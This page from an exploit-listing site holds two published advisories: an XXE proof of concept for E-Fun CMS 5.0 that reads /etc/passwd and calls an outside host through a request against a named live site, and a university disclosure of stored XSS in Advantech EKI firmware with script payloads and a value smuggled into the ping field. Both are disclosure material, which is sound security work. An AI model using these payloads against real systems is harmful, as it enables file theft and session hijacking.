Latest exploits :: CodePwn

<pre><code>==================================================================================================================================== | # Title : E-Fun CMS V5.0 XML external entity injection Vulnerability | | # Author : indoushka | | # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 64.0.2 (32-bit) | | # Vendor : http://www.e-fun.com.tw/ | ==================================================================================================================================== poc : [+] Dorking İn Google Or Other Search Enggine. [+] Vulnerability description : XML supports a facility known as "external entities", which instruct an XML processor to retrieve and perform an inline include of XML located at a particular URI. An external XML entity can be used to append or modify the document type declaration (DTD) associated with an XML document. An external XML entity can also be used to include XML within the content of an XML document. Now assume that the XML processor parses data originating from a source under attacker control. Most of the time the processor will not be validating, but it MAY include the replacement text thus initiating an unexpected file open operation, or HTTP transfer, or whatever system ids the XML processor knows how to access. below is a sample XML document that will use this functionality to include the contents of a local file (/etc/passwd) target : http://127.0.0.1/landtopcomtw/webadmin/ <?xml version="1.0" encoding="utf-8"?> <!DOCTYPE indoushka [ <!ENTITY indoushka SYSTEM "file:///etc/passwd"> ]> <xxx>&indoushka;</xxx> POST /webadmin/_chkpasswd.php HTTP/1.1 Content-type: text/xml Host: landtop.com.tw Content-Length: 175 Connection: Keep-alive Accept-Encoding: gzip,deflate User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.21 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.21 Accept: */* <?xml version="1.0" encoding="utf-8"?> <!DOCTYPE dt5fqyt [ <!ENTITY dt5fqytent SYSTEM "http://hityjSWv9cxlI.bxss.me/"> ]> <_chkpasswd.php>&dt5fqytent;</_chkpasswd.php> [+] Affected items : /webadmin/ /webadmin/_chkpasswd.php /webadmin/index.php [+] The impact of this vulnerability : Attacks can include disclosing local files, which may contain sensitive data such as passwords or private user data, using file: schemes or relative paths in the system identifier. Since the attack occurs relative to the application processing the XML document, an attacker may use this trusted application to pivot to other internal systems, possibly disclosing other internal content via http(s) requests. [+] How to fix this vulnerability : If possible it's recommended to disable parsing of XML external entities. Greetings to :========================================================================================================================= jericho * Larry W. Cashdollar * brutelogic* shadow_00715 *9aylas*djroot.dz*LiquidWorm*Hussin-X*D4NB4R *ViRuS_Ra3cH *yasMouh* CraCkEr | ======================================================================================================================================= </code></pre>

<pre><code>St. Pölten UAS ------------------------------------------------------------------------------- title| Multiple XSS in Advantech product| Advantech EKI-1524-CE series, EKI-1522 series, | EKI-1521 series vulnerable version| <=1.21 (CVE-2023-4202), <=1.24 (CVE-2023-4203) fixed version| 1.26 CVE number| CVE-2023-4202, CVE-2023-4203 impact| Medium homepage| https://advantech.com found| 2023-05-04 by| R. Haas, A. Resanovic, T. Etzenberger, M. Bineder | This vulnerability was discovery during research at | St. Pölten UAS, supported and coordinated by CyberDanube. | | https://fhstp.ac.at | https://cyberdanube.com ------------------------------------------------------------------------------- Vendor description ------------------------------------------------------------------------------- Advantechs corporate vision is to enable an intelligent planet. The company is a global leader in the fields of IoT intelligent systems and embedded platforms. To embrace the trends of IoT, big data, and artificial intelligence, Advantech promotes IoT hardware and software solutions with the Edge Intelligence WISE-PaaS core to assist business partners and clients in connecting their industrial chains. Advantech is also working with business partners to co-create business ecosystems that accelerate the goal of industrial intelligence. Source: https://www.advantech.com/en/about Vulnerable versions ------------------------------------------------------------------------------- EKI-1524-CE series / 1.21 (CVE-2023-4202) EKI-1522-CE series / 1.21 (CVE-2023-4202) EKI-1521-CE series / 1.21 (CVE-2023-4202) EKI-1524-CE series / 1.24 (CVE-2023-4203) EKI-1522-CE series / 1.24 (CVE-2023-4203) EKI-1521-CE series / 1.24 (CVE-2023-4203) Vulnerability overview ------------------------------------------------------------------------------- 1) Stored Cross-Site Scripting (XSS) (CVE-2023-4202, CVE-2023-4203) Two stored cross-site scripting vulnerabilities has been identified in the firmware of the device. The first XSS was identified in the "Device Name" field and the second XSS was found in the "Ping" tool. This can be exploited in the context of a victim's session. Proof of Concept ------------------------------------------------------------------------------- 1) Stored Cross-Site Scripting (XSS) Both cross-site scripting vulnerabilities are permanently affecting the device. 1.1) Stored XSS in Device Name CVE-2023-4202 The first vulnerability can be triggerd by setting the device name ("System->Device Name") to the following value: "><script>alert("document.cookie")</script> This code prints out the cached cookies to the screen. 1.2) Stored XSS in Ping Function CVE-2023-4203 The second XSS vulnerability can be found in "Tools->Ping". The following GET request prints the current cached cookies of a user's session to the screen. http://$IP/cgi-bin/ping.sh?random_num=2013&ip=172.16.0.141%3b%20<script>alert(1)</script>&size=56&count=1&interface=eth0&_=1682793104513 An alternative to the used payload is using "onmouseover" event tags. In this case it prints out the number "1337": " onmousemove="alert(1337)" The vulnerability was manually verified on an emulated device by using the MEDUSA scalable firmware runtime (https://medusa.cyberdanube.com). Solution ------------------------------------------------------------------------------- Upgrade to the newest available firmware. Workaround ------------------------------------------------------------------------------- None. Recommendation ------------------------------------------------------------------------------- Advantech customers are advised to upgrade the firware to the latest available version. Contact Timeline ------------------------------------------------------------------------------- 2023-05-16: Contacting vendor via security contact. 2023-05-24: Contact stated that issue 1.1) is solved after firmware v1.21. The contact is trying to reproduce issue 1.2; Gave advice to reproduce issue. 2023-05-25: Contact stated that new firmware should resolve the issue. 2023-06-03: Sent new payload to the vendor. 2023-06-05: Vendor asked for clarification; Sent further explaination to the contact; Vendor contact said he knows a solution. 2023-06-22: Asked for an update; Contact stated that the beta firmware should resolve the issues. 2023-06-27: Asked for the release date. 2023-07-04: Contact stated, that they are currently doing QA tests. 2023-07-06: Asked if issue 1.1 is really resolved to be released; Vendor stated that it can be published. 2023-07-17: Assigned CVE numbers for the issues. Asked for an update. 2023-07-18: Vendor contact stated that the firmware will be released end of July. 2023-08-07: Asked contact for the new firmware version. 2023-08-08: Received version 1.26 as the official released firmware with fixes. Coordinated release of security advisory. Web: https://www.fhstp.ac.at/ Twitter: https://twitter.com/fh_stpoelten Mail: mis at fhstp dot ac dot at EOF T. Weber / @2023 </code></pre>